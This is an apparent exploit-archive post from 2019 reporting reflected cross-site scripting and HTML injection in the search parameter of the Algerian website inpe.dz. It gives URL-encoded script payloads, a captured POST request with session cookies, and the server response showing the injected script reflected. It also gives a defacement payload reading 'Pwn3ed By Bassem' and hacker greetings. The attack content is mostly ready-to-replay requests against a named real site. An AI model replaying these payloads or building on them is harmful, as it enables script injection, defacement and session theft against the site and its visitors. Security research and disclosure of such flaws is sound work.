inpe.dz Reflected Cross Site Scripting [ XSS ] | HTML Injection

2019.05.13

Dj3Bb4rAn0n_Dz (DZ)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

#############################################################
# Title : inpe.dz Reflected Cross Site Scripting [ XSS ] | HTML Injection
# Author : : Dj3Bb4rAn0n ( bassem ) FB/djebbar.bassem.16
# Date : /11/05/2019
# Home : Annaba ( Algeria )
# Tested on : Linux ( Backbox )
# Vendor : finpe.dz
#############################################################
[ + ] PoC :
# XSS
---------
# inpe.dz/fr/?action=recherche&rubrique=Résultat de la recherche < ==== Inject here
# Payload : %3Cscript%3Ealert%28%2Fhacked%2F%29%3C%2Fscript%3E
-----------
# inpe.dz/fr/?action=recherche&rubrique=Résultat de la recherche%3Cscript%3Ealert%28%2Fhacked%2F%29%3C%2Fscript%3E
--------------------------- Post Request ----------------------------------
POST /fr/?action=recherche&rubrique=R%C3%A9sultat%20de%20la%20recherche HTTP/1.1
Host: inpe.dz
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://inpe.dz/fr/index_acc.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Connection: close
Cookie: fcspersistslider1=2; _ga=GA1.2.394734774.1557577567; _gid=GA1.2.1399442410.1557577567; style=null; __utma=67517641.394734774.1557577567.1557577593.1557583549.2; __utmz=67517641.1557583549.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/; __atuvc=41%7C19; __atuvs=5cd6d6bade5c6855014; __utmb=67517641.21.10.1557583549; __utmc=67517641; __utmt=1
Upgrade-Insecure-Requests: 1
recherche_mot=%3Cscript%3Ealert%28%2Fhacked%2F%29%3C%2Fscript%3E
-----------------------------
---------------------- Response ----------------------------------
HTTP/1.1 200 OK
Date: Sat, 11 May 2019 14:38:26 GMT
Server: Apache
Upgrade: h2
Connection: Upgrade, close
Accept-Ranges: none
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 57434
---------------------------------------------------------------------
<div class="container" >
<div class="content_left">
<h3>&nbsp;R&eacute;sultat de la recherche</h3><script>alert(/hacked/)</script> <script language="javascript" type="text/javascript">
------------------------------------
The javascript code injected
-----------------------------------
# Html injection
-------------------
# inpe.dz/fr/?action=recherche&rubrique=Résultat de la recherche <===== Inject here
# Payload : <center><h1>Pwn3ed By Bassem</h1></center>
# http://inpe.dz/fr/?action=recherche&rubrique=R%C3%A9sultat%20de%20la%20recherche%3Ccenter%3E%3Ch1%3EPwn3d%20By%20Bassem%3C/h1%3E%3C/center%3E
=======================================================
SHOOTZ TO : | Jag gar | Lakarha_23 | Bl4ck
=======================================================

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

inpe.dz Reflected Cross Site Scripting [ XSS ] | HTML Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.